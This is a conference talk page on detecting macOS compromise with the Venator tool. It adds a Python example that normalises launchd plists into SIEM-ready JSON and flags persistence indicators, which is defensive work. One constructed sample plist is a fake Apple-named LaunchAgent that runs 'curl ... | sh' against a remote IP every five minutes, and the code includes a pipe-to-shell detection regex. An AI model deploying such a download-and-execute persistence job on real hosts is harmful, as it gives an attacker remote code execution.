Detecting macOS Compromise with Venator

Presented at Objective by the Sea version 2.0 (2019), June 1, 2019, 2:55 p.m. (30 minutes).

Various solutions exist to detect malicious activity on macOS. However, they are either not intended for enterprise use or require installation of an agent on every host. This session will introduce and demonstrate how to detect malicious macOS activity using the tool Venator. Venator is a Python-based macOS tool designed to provide defenders with the data needed to proactively identify malicious macOS activity at scale. This data can then be imported into a SIEM for the purpose of building robust analytics during hunting engagements.
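To make the "collect host data, ship it to a SIEM, hunt on it" workflow concrete, the following is an added example written for this page; it is not Venator's code and does not reproduce its collectors or output format. It takes launchd persistence plists (LaunchAgents/LaunchDaemons, a common macOS persistence location), flattens each one into a JSON record a SIEM can ingest, and tags a few simple hunting indicators. The two plists, the indicator names and the paths are constructed for an offline run; the heuristics (an Apple-namespaced label outside /System, a shell interpreter as the program, a curl-pipe-to-shell command line, a program under a world-writable directory) are illustrative starting points, not a complete detection set.

```python
"""Added example: normalise launchd plists into JSON lines for SIEM ingestion.

Not Venator's code. Sample plists below are constructed, not real malware.
"""
import json
import plistlib
import re

# Constructed sample plists keyed by the path they would have on disk.
SAMPLE_PLISTS = {
    "/Library/LaunchAgents/com.apple.softwareupdate.plist": b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>Label</key><string>com.apple.softwareupdate</string>
  <key>ProgramArguments</key>
  <array>
    <string>/bin/sh</string>
    <string>-c</string>
    <string>curl -fsSL http://203.0.113.10/u.sh | sh</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>StartInterval</key><integer>300</integer>
</dict>
</plist>
""",
    "/Library/LaunchDaemons/com.example.backup.plist": b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>Label</key><string>com.example.backup</string>
  <key>Program</key><string>/usr/local/bin/backup-agent</string>
  <key>RunAtLoad</key><true/>
</dict>
</plist>
""",
}

# Interpreters that are unusual as the *program* of a persistent job.
SHELLS = {"/bin/sh", "/bin/bash", "/bin/zsh", "/usr/bin/python", "/usr/bin/osascript"}
# Directories any local user can write to; a persistent program there is suspect.
WRITABLE_PREFIXES = ("/tmp/", "/private/tmp/", "/var/tmp/", "/Users/Shared/")
PIPE_TO_SHELL = re.compile(r"\|\s*(ba|z)?sh\b")


def normalise(path, raw):
    """Flatten one launchd plist into a SIEM-friendly dict and tag indicators."""
    plist = plistlib.loads(raw)
    # launchd accepts either ProgramArguments (argv) or a bare Program path.
    args = plist.get("ProgramArguments") or ([plist["Program"]] if "Program" in plist else [])
    cmdline = " ".join(args)
    label = plist.get("Label", "")
    indicators = []

    # Apple's own jobs ship under /System; a com.apple.* label elsewhere mimics them.
    if label.startswith("com.apple.") and not path.startswith("/System/"):
        indicators.append("apple_namespace_outside_system")
    if args and args[0] in SHELLS:
        indicators.append("interpreter_as_program")
    if any(tok.startswith(WRITABLE_PREFIXES) for tok in args):
        indicators.append("world_writable_path")
    if ("curl " in cmdline or "wget " in cmdline) and PIPE_TO_SHELL.search(cmdline):
        indicators.append("download_and_execute")

    return {
        "source": "launchd",
        "path": path,
        "label": label,
        "program": args[0] if args else None,
        "command_line": cmdline,
        "run_at_load": bool(plist.get("RunAtLoad", False)),
        "start_interval": plist.get("StartInterval"),
        "indicators": indicators,
    }


def collect(plists):
    """Normalise every plist in a {path: bytes} mapping, in path order."""
    return [normalise(path, raw) for path, raw in sorted(plists.items())]


def to_jsonl(records):
    """One JSON object per line: the shape most SIEM collectors accept directly."""
    return "\n".join(json.dumps(rec, sort_keys=True) for rec in records)


if __name__ == "__main__":
    print(to_jsonl(collect(SAMPLE_PLISTS)))
```

On a real host the `SAMPLE_PLISTS` mapping would be replaced by reading every file under the LaunchAgents and LaunchDaemons directories (system and per-user); the JSON lines can then be shipped by whatever forwarder the SIEM already uses, and the `indicators` field becomes a first-pass pivot for hunting rather than a verdict, since legitimate software also uses RunAtLoad and shell wrappers.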


Presenters:

  • Richie Cyrus - Senior Consultant at SpecterOps
    Richie Cyrus is a Senior Consultant at SpecterOps, with experience in incident response, digital forensics, network forensics, and security operations within the Fortune 500 and the Federal Government. He specializes in detection of advanced adversaries with a focus on macOS and Linux environments. Richie currently maintains a DFIR-focused blog at https://medium.com/securityneversleeps.
